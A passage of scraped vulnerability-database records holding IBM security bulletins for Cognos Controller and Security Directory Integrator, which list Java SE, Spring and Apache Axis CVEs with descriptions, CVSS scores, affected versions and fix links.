(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21360](<https://vulners.com/cve/CVE-2022-21360>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217654>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21349](<https://vulners.com/cve/CVE-2022-21349>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the 2D component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217643](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217643>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21341](<https://vulners.com/cve/CVE-2022-21341>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217636](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217636>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21340](<https://vulners.com/cve/CVE-2022-21340>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217635](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217635>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21305](<https://vulners.com/cve/CVE-2022-21305>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217600](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217600>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21294](<https://vulners.com/cve/CVE-2022-21294>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217589](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217589>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21293](<https://vulners.com/cve/CVE-2022-21293>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217588](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217588>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21291](<https://vulners.com/cve/CVE-2022-21291>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217586](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217586>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21248](<https://vulners.com/cve/CVE-2022-21248>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2016-1000027](<https://vulners.com/cve/CVE-2016-1000027>) \n** DESCRIPTION: **Pivota Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw in the library. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/174367](<https://exchange.xforce.ibmcloud.com/vulnerabilities/174367>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-9878](<https://vulners.com/cve/CVE-2016-9878>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by the failure to sanitize paths provided to ResourceServlet. An attacker could send a specially-crafted URL request containing directory traversal sequences to view arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/120241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/120241>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-11039](<https://vulners.com/cve/CVE-2018-11039>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to cross-site tracing, caused by a flaw in the HiddenHttpMethodFilter in Spring MVC. By persuading a victim to visit a specially-crafted Web site, an attacker could exploit this vulnerability to cause the victim's browser to invoke a TRACE request to return sensitive header information including cookies or authentication data from third-party domains. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145412](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145412>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-11040](<https://vulners.com/cve/CVE-2018-11040>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to bypass security restrictions, caused by a flaw in AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView. By sending a specially-crafted request, an attacker could exploit this vulnerability to perform cross-domain requests. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145413](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145413>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2018-1199](<https://vulners.com/cve/CVE-2018-1199>) \n** DESCRIPTION: **Pivotal Spring Security and Spring Framework could allow a remote attacker to bypass security restrictions, caused by the failure to consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker could exploit this vulnerability to bypass access restrictions and gain access to the server and obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138601](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138601>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1257](<https://vulners.com/cve/CVE-2018-1257>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to a denial of service. By sending a specially-crafted message, a remote attacker could exploit this vulnerability to perform a regular expression denial of service attack. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/143316](<https://exchange.xforce.ibmcloud.com/vulnerabilities/143316>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-1270](<https://vulners.com/cve/CVE-2018-1270>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141284](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141284>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1271](<https://vulners.com/cve/CVE-2018-1271>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to configure Spring MVC to serve static resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141285](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141285>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-1272](<https://vulners.com/cve/CVE-2018-1272>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain elevated privileges. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-1275](<https://vulners.com/cve/CVE-2018-1275>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141565](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141565>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-11272](<https://vulners.com/cve/CVE-2019-11272>) \n** DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to bypass security restrictions, caused by a flaw in the PlaintextPasswordEncoder function. By using a password of \"null\", an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166568>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2019-3795](<https://vulners.com/cve/CVE-2019-3795>) \n** DESCRIPTION: **Pivotal Spring Security could provide weaker than expected security, caused by an insecure randomness flaw when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N) \n \n** CVEID: **[CVE-2020-5408](<https://vulners.com/cve/CVE-2020-5408>) \n** DESCRIPTION: **VMware Tanzu Spring Security could allow a remote attacker to obtain sensitive information, caused by the use of a fixed null initialization vector with CBC Mode. By using dictionary attack techniques, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181969](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181969>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2021-22112](<https://vulners.com/cve/CVE-2021-22112>) \n** DESCRIPTION: **Jenkins weekly could allow a remote authenticated attacker to gain elevated privileges on the system, caused by a flaw in user session. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges as SYSTEM. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197071](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197071>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-2388](<https://vulners.com/cve/CVE-2021-2388>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to take control of the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205815](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205815>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-2369](<https://vulners.com/cve/CVE-2021-2369>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Library component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205796](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205796>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-2432](<https://vulners.com/cve/CVE-2021-2432>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JNDI component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205856](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205856>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-21496](<https://vulners.com/cve/CVE-2022-21496>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JNDI component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224777](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224777>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21434](<https://vulners.com/cve/CVE-2022-21434>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224718](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224718>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21443](<https://vulners.com/cve/CVE-2022-21443>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224726](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224726>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-39038](<https://vulners.com/cve/CVE-2021-39038>) \n** DESCRIPTION: **IBM WebSphere Application Server 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.2 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 213968. \nCVSS Base score: 4.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213968](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213968>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N) \n \n** IBM X-Force ID: **220575 \n** DESCRIPTION: **Spring Framework could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the SerializableTypeWrapper class. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220575 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220575>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s) \n** \n---|--- \nIBM Cognos Controller| 10.4.2 \nIBM Cognos Controller| 10.4.1 \nIBM Cognos Controller| 10.4.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading.\n\n**Product(s)**| **Versions() \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Cognos Controller| 10.4.2| [Download IBM Cognos Controller 10.4.2 FP2 from Fix Central](<https://www.ibm.com/support/pages/node/6608092> \"IBM Cognos Controller 10.4.2 FP2\" ) \nIBM Cognos Controller| 10.4.1| \n\n[Download IBM Cognos Controller 10.4.1 IF15 from Fix Central](<https://www.ibm.com/support/pages/node/6831325> \"IBM Cognos Controller 10.4.1 IF15 \\(add URL prior to publish\\)\" ) \n \nIBM Cognos Controller| 10.4.0| \n\n[Download IBM Cognos Controller 10.4.2 FP2 from Fix Central](<https://www.ibm.com/support/pages/node/6608092> \"IBM Cognos Controller 10.4.2 FP2\" ) \n \n**IBM Cognos Controller Cloud**\n\nRemediation for IBM Cognos Controller 10.4.2 Cloud environments has completed and no further action is required.\n\nRemediation for IBM Cognos Controller 10.4.1 Cloud environments will be completed during the next scheduled maintenance weekend.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-02T19:43:36", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller has addressed multiple vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000027", "CVE-2016-9878", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1199", "CVE-2018-1257", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-25031", "CVE-2019-11272", "CVE-2019-3795", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-5408", "CVE-2020-5421", "CVE-2020-7656", "CVE-2021-22060", "CVE-2021-22096", "CVE-2021-22112", "CVE-2021-2369", "CVE-2021-2388", "CVE-2021-2432", "CVE-2021-35517", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35560", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-36090", "CVE-2021-39031", "CVE-2021-39038", "CVE-2021-41035", "CVE-2021-46708", "CVE-2022-21248", "CVE-2022-21291", "CVE-2022-21293", "CVE-2022-21294", "CVE-2022-21305", "CVE-2022-21340", "CVE-2022-21341", "CVE-2022-21349", "CVE-2022-21360", "CVE-2022-21365", "CVE-2022-21434", "CVE-2022-21443", "CVE-2022-21496", "CVE-2022-22475", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-12-02T19:43:36", "id": "2BE1B762E9F077419A696E0C1B88E2D3F236BE3549BFC2182468480E071BF032", "href": "https://www.ibm.com/support/pages/node/6841803", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T13:33:29", "description": "## Summary\n\nIBM Security Directory Integrator has addressed several security issues in open source packages. Please apply the fix as detailed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2018-1270](<https://vulners.com/cve/CVE-2018-1270>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141284](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141284>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-9878](<https://vulners.com/cve/CVE-2016-9878>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by the failure to sanitize paths provided to ResourceServlet. An attacker could send a specially-crafted URL request containing directory traversal sequences to view arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/120241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/120241>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1271](<https://vulners.com/cve/CVE-2018-1271>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to configure Spring MVC to serve static resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141285](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141285>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2014-0054](<https://vulners.com/cve/CVE-2014-0054>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error in Jaxb2RootElementHttpMessageConverter when processing XML data. By sending specially-crafted XML data, an attacker could exploit this vulnerability to read arbitrary files and obtain sensitive information. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/91841](<https://exchange.xforce.ibmcloud.com/vulnerabilities/91841>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2013-4152](<https://vulners.com/cve/CVE-2013-4152>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending a specially-crafted request, an attacker could exploit this vulnerability to read arbitrary files and obtain sensitive information. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/86589](<https://exchange.xforce.ibmcloud.com/vulnerabilities/86589>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2015-5211](<https://vulners.com/cve/CVE-2015-5211>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to download arbitrary files, caused by a reflected file download attack. By using a specially crafted URL with a batch script extension, an attacker could exploit this vulnerability to download a malicious response. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/130673](<https://exchange.xforce.ibmcloud.com/vulnerabilities/130673>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-8032](<https://vulners.com/cve/CVE-2018-8032>) \n** DESCRIPTION: **Apache Axis is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the default servlet/services. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/147823](<https://exchange.xforce.ibmcloud.com/vulnerabilities/147823>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2013-7315](<https://vulners.com/cve/CVE-2013-7315>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending a specially-crafted request, an attacker could exploit this vulnerability to read arbitrary files and obtain sensitive information. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/95219](<https://exchange.xforce.ibmcloud.com/vulnerabilities/95219>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2020-5421](<https://vulners.com/cve/CVE-2020-5421>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by improper input validation. By using a specially-crafted jsessionid path parameter, an attacker could exploit this vulnerability to bypass RFD Protection. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-6429](<https://vulners.com/cve/CVE-2013-6429>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to obtain sensitive information, caused by an error when parsing XML entities. By persuading a victim to open a specially-crafted XML document containing external entity references, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/90451](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90451>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2014-3596](<https://vulners.com/cve/CVE-2014-3596>) \n** DESCRIPTION: **Apache Axis and Axis2 could allow a remote attacker to conduct spoofing attacks, caused by and incomplete fix related to the failure to verify that the server hostname matches a domain name in the subject's Common Name (CN) field of the X.509 certificate. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ 